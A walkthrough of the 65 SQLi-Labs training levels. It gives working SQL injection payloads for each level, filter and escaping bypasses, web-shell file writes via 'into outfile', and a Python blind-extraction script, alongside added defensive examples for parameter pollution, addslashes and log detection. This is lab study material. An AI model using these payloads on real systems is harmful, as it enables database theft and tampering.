SQLi-Labs walkthrough (Less 1-65)

Less-1 Error-based GET single-quote string injection

Less-2 Error-based GET integer injection

Less-3 Error-based GET single-quote string injection with twist

Less-4 Error-based GET double-quote string injection

Less-5 Double-query GET single-quote string injection

Less-6 Double-query GET double-quote string injection

Less-7 Dump-into-outfile GET string injection

Less-8 Boolean-based single-quote GET blind injection

Less-9 Time-based GET single-quote blind injection

Less-10 Time-based double-quote blind injection

Less-11 Error-based POST single-quote string injection

Less-12 Error-based POST double-quote string injection with twist

Less-13 POST single-quote with twist, double query

Less-14 POST double-quote with twist, double query

Less-15 Boolean/time-based single-quote POST blind injection

Less-16 POST double-quote with parentheses, time-based blind injection

Less-17 Error-based POST injection in an UPDATE query

Less-18 Error-based User-Agent header POST injection

Less-19 Error-based Referer header POST injection

Less-20 Error-based Cookie header POST injection

Less-21 Error-based complex string Cookie injection

Less-22 Error-based double-quote string Cookie injection

Less-23 Error-based GET injection with comments filtered

Less-24 Second-order injection

Less-25 or and and filtered

Less-26 Comments and spaces filtered

Less-26a Blind injection with spaces and comments filtered

Less-27 union and select filtered

Less-27a union and select filtered

Less-28 union and select filtered case-insensitively

Less-28a Blind injection, union and select filtered case-insensitively

Less-29 GET - Error based - Impedance mismatch - a WAF sits in front of the web application

Less-30 Blind - Impedance mismatch - a WAF sits in front of the web application

Less-31 Blind - Impedance mismatch - a WAF sits in front of the web application

Less-32 GET - Bypass a custom filter that adds slashes to dangerous characters

Less-33 Bypass addslashes()

Less-34 Bypass addslashes()

Less-35 GET - Bypass add slashes (we don't need it) - Integer

Less-36 GET - Bypass mysql_real_escape_string

Less-37 POST - Bypass mysql_real_escape_string

Less-38 Stacked queries

Less-39 GET - Stacked Query Injection - Integer based

Less-40 GET - BLIND based - String - Stacked

Less-41 GET - BLIND based - Integer - Stacked

Less-42 POST - Stacked Query error based

Less-43 POST - Stacked Query error based with twist

Less-44 POST - Error based - String - Stacked - Blind

Less-45 POST - Error based - String - Stacked - Blind

Less-46 ORDER BY - Error - Numeric

Less-47 ORDER BY Clause - Error - Single quote

Less-48 ORDER BY Clause Blind based

Less-49 ORDER BY Clause Blind based

Less-50 ORDER BY Clause Blind based

Less-51 ORDER BY Clause Blind based

Less-52 ORDER BY Clause Blind based

Less-53 ORDER BY Clause Blind based

Less-54 GET - challenge - Union - 10 queries allowed - Variation 1

Less-55 GET - challenge - Union - 14 queries allowed - Variation 2

Less-56 GET - challenge - Union - 14 queries allowed - Variation 3

Less-57 GET - challenge - Union - 14 queries allowed - Variation 4

Less-58 GET - challenge - Double Query - 5 queries allowed - Variation 1

Less-59 GET - challenge - Double Query - 5 queries allowed - Variation 2

Less-60 GET - challenge - Double Query - 5 queries allowed - Variation 3

Less-61 GET - challenge - Double Query - 5 queries allowed - Variation 4

Less-62 GET - challenge - Blind - 130 queries allowed - Variation 1

Less-63 GET - challenge - Blind - 130 queries allowed - Variation 2

Less-64 GET - challenge - Blind - 130 queries allowed - Variation 3

Less-65 GET - challenge - Blind - 130 queries allowed - Variation 4

Reproducing the sqli-labs levels (in-depth study)

To avoid polluting my local machine I run sqli-labs in Docker. Setup is simple, just two commands:

docker pull acgpiano/sqli-labs

docker run -dt --name sqli-lab -p [port to map]:80 acgpiano/sqli-labs:latest

Then initialise the database directly from the sqli-labs page.

Basic SQL statements used throughout:

show databases; //list databases

use xxx; //switch to a database

show tables; //list the tables of the current database

desc xxx; //show a table's structure

select * from xxx; //select everything in a table

select schema_name from information_schema.schemata; //enumerate databases

select table_name from information_schema.tables where table_schema='xxxxx'; //enumerate the tables of a database

select column_name from information_schema.columns where table_name='xxxxx'; //enumerate the columns of a table

left(a,b) //take the leftmost b characters of a

mid(column_name,start[,length]) //take length characters of column_name starting at position start; same as substr

substr(string, start, length) //take length characters of string starting at position start; same as mid

ascii() //convert a character to its ASCII code

ord() //convert a character to its ASCII code; same as ascii()

Less-1

Appending ' to the id produces an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

The error message shows exactly where our input lands, so we comment out the rest of the statement and use

1' order by 3%23 //the column count is 3

//-1 is used below so that the first query matches no existing id, leaving its result empty and showing only the second query's rows

-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23 //database names

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'# //table names

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'# //column names

-1' union select 1,username,password from users where id=3# //dump the data

Less-2

After appending ' the response is

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

So this statement has no single quotes at all; the id is used as a bare number, for example

select * from users where id=1

The same approach as above therefore works, payload:

-1 or 1=1%23

Less-3

After appending ' the response is

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

From this the statement is roughly:

select * from users where id=('input') LIMIT 0,1;

So we also need to close the ).

-1') or 1=1%23

Less-4

Appending ' gives no error; appending " does:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

From this the statement is roughly

select * from users where id = ("input") LIMIT 0,1;

So the payload is:

-1") or 1=1 %23

The remaining injection statements are the same as above and are not repeated here.

Less-5

Appending ' produces an error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

The statement is presumably

select * from users where id='input' LIMIT 0,1;

If you try the earlier injection methods you will find that the injected data is no longer returned. When the injection succeeds the page shows You are in..., and when it fails that string is absent, so this is a blind injection.

Using left()

For example the payload 1' and left(version(),1)=3%23 takes the leftmost character of version() and tests whether it is 3: if so the page returns You are in..., otherwise it does not. Stepping through candidates this way yields left(version(),1)=5. The candidate range can be restricted to /[0-9.]/.

1' and length(database())=8%23 brute-forces the length of the database name. Once the length is known, database() is used to recover the name with payloads such as left(database(),1)>'a'; the principle is the same as above, just read the response, and the prefix is extended until its length equals the name's length. The efficient way to do this blind is a binary search.

Using substr() and ascii()

The substr() and ascii() functions can be used the same way:

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23 //compare the first character of the first table in the current database against ASCII 80

For the second character change it to substr('xxx',2,1).
For the second table change it to limit 1,1.

Using regexp()

1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)%23
//does the users table have a column whose name starts with us?

Using ord() and mid()

1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23
//cast(username AS CHAR) converts username to a string
//IFNULL(expr1,expr2) returns expr1 if expr1 is not NULL, otherwise expr2; whether the result is numeric or a string depends on the context in which it is used
//ord was covered above

Using error-based injection

A very detailed article on error-based injection is recommended:

Mysql报错注入原理分析(count()、rand()、group by)

Link: https://www.cnblogs.com/xdans/p/5412468.html

1' union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

1' union select 1,count(*) ,concat((select user()),floor(rand(0)*2))x from security.users group by x#

1' union select (!(select * from (select user())x) - ~0),2,3 --+

1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+

1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+

1' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+

Using time-based injection

benchmark is a MySQL built-in function for measuring how fast a function executes. benchmark() takes two arguments: the number of executions and the function or expression to execute.

1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+

Less-6

Nothing is echoed back, so boolean blind injection can be used

1" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--+

With >100 the page responds, with less than 100 it does not; error-based injection also works...

This is simply Less-5 with ' replaced by "

Less-7

Using file export

1'))UNION SELECT 1,2,3 into outfile "c:\wamp\www\sqllib\Less-7\uuu.txt"%23

1'))UNION SELECT 1,2,'' into outfile "c:\wamp\www\sqllib\Less-7\yijuhua.php"--+

Less-8

Time-based blind injection works, and so does boolean blind injection

1' and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+

Less-9

As in Less-8, time-based blind injection works

1' and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+

Less-10

1" and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+

Less-11

Error-based injection; just use one column fewer

1' union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#

1' union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

Less-12

1") union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#

1") union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

Less-13

1') or 1=1#

Login succeeds; error-based injection works but nothing is echoed, so consider blind injection

1') or ascii(substr((database()),1,1))>100#

Less-14

1" or 1=1#

Login succeeds but still nothing is echoed; try boolean blind injection

1" or left(database(),1)='s'#

updatexml turns out to work for error-based injection

1" and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Less-15

1' or 1=1#

Login succeeds; both boolean and time-based blind injection work

1' or left(database(),1)='s'#
admin' and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

Less-16

1") or 1=1#

Login succeeds; both boolean and time-based blind injection work

1") or left(database(),1)='s'#
admin") and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

Less-17

UPDATE injection. The username field is heavily filtered, but errors from the password field are echoed, so use error-based injection

1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Less-18

After a successful login the page shows

Your IP ADDRESS is: 172.17.0.1
Your User Agent is: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0

So it may be an IP or User-Agent injection; on inspection it is a header injection. Note that it only triggers after a successful login, and since it is an INSERT injection the rest of the SQL statement must be closed with '1'='1, otherwise it is a syntax error

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1),"1","1")#

Less-19

After a successful login the page shows

Your IP ADDRESS is: 172.17.0.1
Your Referer is: http://localhost:8081/Less-19/

So the injection point should be the Referer; the same payload works there

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1

Less-20

Cookie injection: log in, then modify the cookie

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1

Less-21

After logging in, the cookie turns out to be base64-encoded

YOUR COOKIE : uname = YWRtaW4=

Base64-encode the payload above; remember to URL-encode the =

JyBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAnMSc9JzE%3d

Less-22

Same as Less-21 with single quotes replaced by double quotes

IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAiMSI9IjE%3d

Less-23

Both # and --+ are filtered here, but we can use or "1"="1 to close the trailing quote and achieve the same result

-1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1

Less-24

This is a second-order injection. Register an account named admin'#, then on the change-password page you can change admin's password using your own password, because the SQL statement built there is

UPDATE users SET passwd="New_Pass" WHERE username ='admin'#'xxxx

so the # comments out the rest of the statement.

Less-25

The level is direct about it: or and and are filtered, but && and || get past the filter

admin'||updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Double-writing the keyword also works

0' union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata;#

Less-25a

-1 union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata %23

Less-26

The level says spaces and comments are filtered; %0a gets past that, and both blind and error-based injection work

0'||left(database(),1)>'s'%26%26'1'='1
0'||updatexml(1,concat(0x7e,(Select%0a@@version),0x7e),1)||'1'='1

Less-26a

The level says spaces and comments are filtered; %a0 gets past that. Error-based injection yields nothing, so use boolean blind injection

0'||'1'='1 #probing shows the closing character is '
0'||left(database(),1)='s'%26%26'1'='1

White-box review shows the closing sequence is ')
0%27)%a0union%a0select%a01,database(),2||('1
0%27)%a0union%a0select%a01,database(),2;%00

Less-27

The level says union and select are filtered; mixed case gets past the filter

0'||'1'='1
0'||left(database(),1)='s'%26%26'1'='1

0'%0AunIon%0AselEct%0A1,group_concat(schema_name),2%0Afrom%0Ainformation_schema.schemata;%00

Less-27a

Adds "

0"%0AunIon%0AselEct%0A1,group_concat(schema_name),2%0Afrom%0Ainformation_schema.schemata;%00

Less-28

union select is filtered in every case, but select on its own still works, so use blind injection

0')||left(database(),1)>'s';%00

Less-28a

Blind injection still works

0')||left((database()),1)='s';%00
0')||left((selEct%0agroup_concat(schema_name)%0afrom%0Ainformation_schema.schemata),1)<'s';%00

Less-29

This exploits the fact that Tomcat and Apache resolve repeated request parameters differently: Tomcat takes the first occurrence and Apache the second, so for ?id=1&id=2 Tomcat sees 1 and Apache sees 2

?id=1&id=0' union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-30

Same architecture and principle as Less-29, only with " as the closing character

?id=1&id=0" union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-31

Same architecture, with ") as the closing sequence

?id=1&id=0") union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23
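The Less-29 to Less-31 setup only works because the WAF tier and the backend disagree on which copy of a repeated parameter counts. The following is an added example, not code from this walkthrough or from sqli-labs: it shows both resolution rules in Python's standard library and a strict resolver that refuses requests with repeated parameters, which is the check a front end should apply so the two tiers never see different values.

```python
from urllib.parse import parse_qs, parse_qsl


def first_wins(query: str) -> dict:
    """Tomcat-style resolution: the first occurrence of each parameter is used."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def last_wins(query: str) -> dict:
    """PHP/Apache-style resolution: the last occurrence overwrites earlier ones."""
    return dict(parse_qsl(query, keep_blank_values=True))


def polluted_params(query: str) -> list:
    """Names of parameters that occur more than once. A WAF inspecting one copy
    and a backend executing the other is exactly the impedance mismatch of Less-29."""
    values = parse_qs(query, keep_blank_values=True)
    return sorted(name for name, vals in values.items() if len(vals) > 1)


def resolve_strictly(query: str) -> dict:
    """Fail closed: reject any request with a repeated parameter, otherwise return
    the single value of each parameter so both tiers would agree on it."""
    duplicates = polluted_params(query)
    if duplicates:
        raise ValueError("repeated query parameter(s): " + ", ".join(duplicates))
    return first_wins(query)


# Constructed query string in the shape of the Less-29 request.
POLLUTED = "id=1&id=0%27%20union%20select%201,database(),3%23"
```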

Less-32

Note the charset is GBK, so %df can be used for wide-byte injection

0%df%27%20or%201=1%23
0%df' union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-33

0%df' union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-34

uname=0%df'%20union+selEct%201,group_concat(schema_name)%20from%20information_schema.schemata%3b%23&passwd=1&submit=Submit

Less-35

0 union selEct 1,group_concat(schema_name),2 from information_schema.schemata;%23

Less-36

0%df%27%20union%20selEct%201,group_concat(schema_name),2%20from%20information_schema.schemata;%23
-1%EF%BF%BD%27union%20select%201,user(),3--+

Less-37

uname=0%df%27%20union%20selEct%20group_concat(schema_name),2%20from%20information_schema.schemata;%23&passwd=1&submit=Submit
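Why addslashes() does not protect a GBK connection in Less-32 to Less-37, as an added example that is not from this walkthrough or the sqli-labs code. It emulates PHP's addslashes() on raw bytes and then decodes the result in the connection charset, the way the server does; the byte 0xdf in front of the quote is the one used above. The defensive point is in the comments: escaping is only correct when the escaping layer knows the connection charset (PHP's mysqli_set_charset()), and prepared statements avoid the question entirely.

```python
# PHP addslashes() puts a backslash before ' " \ and NUL, byte by byte, without
# knowing which multibyte charset the database will use to decode the bytes.
ESCAPED = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}


def addslashes(raw: bytes) -> bytes:
    """Byte-level emulation of PHP addslashes()."""
    return b"".join(ESCAPED.get(b, bytes([b])) for b in raw)


def decode_as_server(escaped: bytes, charset: str) -> str:
    """What the SQL parser sees after the escaped bytes are decoded in the connection charset."""
    return escaped.decode(charset, errors="replace")


def quote_survives(raw: bytes, charset: str) -> bool:
    """True if a quote reaches the SQL parser without a backslash in front of it.

    Under GBK the lead byte 0xdf swallows the inserted backslash (0x5c) as the trail
    byte of a two-byte character, so the quote that follows is back in play. Under
    UTF-8 the lone 0xdf is an invalid sequence and the backslash stays intact.
    """
    text = decode_as_server(addslashes(raw), charset)
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


# Constructed input in the shape of the Less-32 payload prefix: "0", 0xdf, "'".
WIDE_BYTE_INPUT = b"0\xdf'"

# Mitigation: make escaping charset-aware (mysqli_set_charset('gbk') in PHP, so
# mysqli_real_escape_string() knows 0xdf starts a two-byte character), prefer a
# utf8mb4 connection, and bind user input with prepared statements.
```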

Less-38

Stacked injection; the test table is created successfully

1';create table test like users;%23

Less-39

1;create table test39 like users;%23

Less-40

1');create table test40 like users;%23

Less-41

1;create table test41 like users;%23

Less-42

The password field is not filtered

login_user=1&login_password=1'%3bcreate+table+test43+like+users%3b%23&mysubmit=Login

Less-43

The password field is not filtered

login_user=1&login_password=1')%3bcreate+table+test43+like+users%3b%23&mysubmit=Login

Less-44

login_user=1&login_password=1'%3bcreate+table+test44+like+users%3b%23&mysubmit=Login

Less-45

login_user=1&login_password=1')%3bcreate+table+test45+like+users%3b%23&mysubmit=Login

Less-46

ORDER BY injection

username and password are both column names, so the payloads below require knowing column names

?order=if(1=1,username,password)
?order=null,if(1=1,username,password)
?order=(case when (1=1) then username else password end)
?order=ifnull(null, username)
?order=rand(1=1) //order by rand(1) and order by rand(0) return different orderings
?order=(select 1 regexp if(1=1,1,0x00))

Replace 1=1 with a boolean-blind expression to extract data

sort=rand(ascii(left(database(),1))=115)

Time-based blind injection

sort=1 and if(ascii(substr(database(),1,1))=116,0,sleep(5))
sort=(select if(substring(current,1,1)=char(115),benchmark(5000000,md5('1')),null) from (select database() as current) as tb1)

Boolean blind injection

rand(ascii(left(database(),1))=115)

Error-based injection:

updatexml(1,if(1=1,concat(0x7e,version()),2),1)
(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

Injection after the procedure analyse parameter

sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

into outfile parameter:

id=1 into outfile "path"

To write a web shell, append lines terminated by followed by the hex-encoded data

Less-47

There is a ', so error-based injection works

1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+
1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+

Time-based blind injection also works

1'and If(ascii(substr(database(),1,1))=115,0,sleep (5))--+

Injection after the procedure analyse parameter

1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

Less-48

1 and If(ascii(substr(database(),1,1))>115,0,sleep (5))--+
sort=rand(ascii(left(database(),1))=115)

Less-49

1' and If(ascii(substr(database(),1,1))=115,0,sleep (5))--+
1' and (If(ascii(substr((select username from users where id=1),1,1))=68,0,sleep(5)))--+

Less-50

Stacked injection

1;create table test50 like users;%23

Less-51

1';create table test51 like users;%23

Less-52

1;create table test52 like users;%23

Less-53

1';create table test53 like users;%23

Less-54

If the submit button is not clicked, execution falls into the else branch below, which has filtering, so the way in is clearly the branch above. Clicking submit sets a cookie; then there is a GET id parameter followed by a database update. The level allows 10 requests, after which it updates the database.

http://192.168.211.145/sqli/Less-54/index.php?id=-1%27%20union%20select%201,database(),%273 //database
http://192.168.211.145/sqli/Less-54/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23 //tables
http://192.168.211.145/sqli/Less-54/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ecimhbu7cx //columns
http://192.168.211.145/sqli/Less-54/index.php?id=-1' union select 1,group_concat(secret_NO71),3 from ecimhbu7cx%23 //data

Less-55

This level allows 14 requests, but once the closing sequence is found everything else goes smoothly.
First find the closing sequence

http://192.168.211.145/sqli/Less-55/?id=1'%23 //error
http://192.168.211.145/sqli/Less-55/?id=1')%23 //error
http://192.168.211.145/sqli/Less-55/?id=1)%23 //correct

So the statement is closed with )

http://192.168.211.145/sqli/Less-55/?id=-1) union select 1,database(),3%23

Less-56

These levels are all similar; again, start by finding the closing sequence

http://192.168.211.145/sqli/Less-56/index.php?id=1')%23 //closes correctly
http://192.168.211.145/sqli/Less-56/index.php?id=-1') union select 1,database(),3%23

Less-57

This level is closed with a double quote

http://192.168.211.145/sqli/Less-57/?id=-1" union select 1,database(),3%23

Less-58

The query returns none of the data from the database, so union injection cannot be used, but errors are echoed, so error-based injection works.

http://192.168.211.145/sqli/Less-58/index.php?id=0' and extractvalue(1, concat(0x5c, (select database())))%23

Less-59

SQL statement:

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

payload:

http://192.168.211.145/sqli/Less-59/index.php?id= 1 and extractvalue(1, concat(0x5c, (select database())))%23

Less-60

http://192.168.211.145/sqli/Less-60/?id=1") and extractvalue(1, concat(0x5c, (select database())))%23

Less-61

http://192.168.211.145/sqli/Less-61/?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23

Less-62

The next few levels must be solved blind within 130 requests. With a request limit, plain brute force is obviously out.

http://192.168.211.145/sqli/Less-62/index.php?id=1') and (length(database())=10)%23

Script to recover the database name:

# -*- coding: UTF-8 -*-
import requests

num = 0  # number of requests sent; the level allows at most 130
url = "http://192.168.211.145/sqli/Less-62/index.php?id=1')"

def check(payload):
    """Send one request; 'Angelina' appears in the page only when the injected condition is true."""
    global num
    num += 1
    content = requests.get(url=payload).text
    print(payload)
    if "Angelina" in content:
        return 1
    else:
        return 0

def exp():
    result = ''
    start = 30
    end = 127
    for i in range(1, 11):  # the database name is 10 characters long (length(database())=10)
        for j in range(start, end):
            tmp = (start + end) // 2  # binary search over the printable ASCII range
            payload = url + "and ascii(substr(database(),%d,1))>%d--+" % (i, tmp)
            if end - start == 1:
                payload = url + "and ascii(substr(database(),%d,1))=%d--+" % (i, tmp)
                if check(payload):
                    result += chr(tmp)
                else:
                    result += chr(tmp + 1)
                start = 30
                end = 127
                break
            if check(payload):
                start = tmp
            else:
                end = tmp
    print(result)

if __name__ == '__main__':
    exp()
    print(num)

Script to recover the field:

# -*- coding: UTF-8 -*-
import requests

num = 0  # number of requests sent; the level allows at most 130
url = "http://192.168.211.145/sqli/Less-62/index.php?id=1')"

def check(payload):
    """Send one request; 'Angelina' appears in the page only when the injected condition is true."""
    global num
    num += 1
    content = requests.get(url=payload).text
    print(payload)
    if "Angelina" in content:
        return 1
    else:
        return 0

def exp():
    result = ''
    start = 30
    end = 127
    for i in range(1, 25):  # one character per position, 24 positions
        for j in range(start, end):
            tmp = (start + end) // 2  # binary search over the printable ASCII range
            payload = url + "and ascii(substr((select secret_28HE from qyzq3rflb5),%d,1))>%d--+" % (i, tmp)
            if end - start == 1:
                payload = url + "and ascii(substr((select secret_28HE from qyzq3rflb5),%d,1))=%d--+" % (i, tmp)
                if check(payload):
                    result += chr(tmp)
                else:
                    result += chr(tmp + 1)
                start = 30
                end = 127
                break
            if check(payload):
                start = tmp
            else:
                end = tmp
    print(result)

if __name__ == '__main__':
    exp()
    print(num)
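The request limit in Less-62 exists because a blind extraction like the script above is noisy: it sends one request per bit of every character, and the requests differ only in numbers. The following is an added detection example, not code from this walkthrough or from sqli-labs. It runs over constructed access-log lines in an assumed combined-log-style format and flags the payload families used on this page (union select, updatexml/extractvalue, ascii(substr()) probes, sleep/benchmark, stacked queries, information_schema, and the %df%27 wide-byte prefix), then collapses digits in the decoded request target to expose a per-client binary-search burst.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signature families taken from the payloads used in this walkthrough.
INDICATORS = {
    "union_select": re.compile(r"union\s+select", re.I),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "blind_probe": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|mid|left)\b", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "stacked_query": re.compile(r";\s*(create|drop|insert|update)\s", re.I),
    "schema_probe": re.compile(r"information_schema", re.I),
    "wide_byte_quote": re.compile(r"%df(%27|')", re.I),  # only visible before decoding
}
# Assumed log format for this demo: client, ident, user, [timestamp], request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def normalise(target: str) -> str:
    """Decode twice (catches double encoding), fold %0a/%a0-style whitespace, lowercase."""
    text = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", text).lower()


def classify(target: str) -> list:
    """Indicator names matching either the raw or the decoded request target."""
    text = normalise(target)
    return [n for n, rx in INDICATORS.items() if rx.search(target) or rx.search(text)]


def scan(log_lines) -> list:
    """(client, status, indicators) for every request carrying at least one indicator."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group(2))
        if hits:
            findings.append((m.group(1), m.group(3), hits))
    return findings


def blind_templates(log_lines, threshold: int = 20) -> dict:
    """Blind extraction sends many requests that differ only in numbers (position and
    ASCII guess); collapse digits to '#' and count identical templates per client."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and set(classify(m.group(2))) & {"blind_probe", "time_based"}:
            counts[(m.group(1), re.sub(r"\d+", "#", normalise(m.group(2))))] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


# Constructed sample log: one benign request, three one-shot payloads in the shape of
# Less-1, Less-32 and Less-38, then 25 requests of a Less-62-style binary search.
SAMPLE_LOG = [
    '172.17.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200',
    '172.17.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,2,3%20from%20information_schema.schemata%23 HTTP/1.1" 200',
    '172.17.0.1 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-32/?id=0%df%27%20or%201=1%23 HTTP/1.1" 200',
    '172.17.0.1 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-38/?id=1%27;create%20table%20test%20like%20users;%23 HTTP/1.1" 200',
] + [
    '172.17.0.1 - - [01/Jan/2024:10:01:%02d +0000] "GET /Less-62/?id=1%%27)and%%20ascii(substr(database(),%d,1))>%d--+ HTTP/1.1" 200'
    % (i, 1 + i // 7, 78 + i) for i in range(25)
]
```

A real deployment would key the burst counter on a time window as well as on client and template, and lower the threshold on endpoints that never legitimately take SQL-like input.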

Less-63

This level is the same as the previous one; the only difference is that it is closed with a single quote

Not repeated here.

Less-64

This level is the same as the previous one; the only difference is that it is closed with parentheses

Not repeated here.

Less-65

These levels all work the same way and differ only in the closing sequence, so they are not repeated here

SQL statement:

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";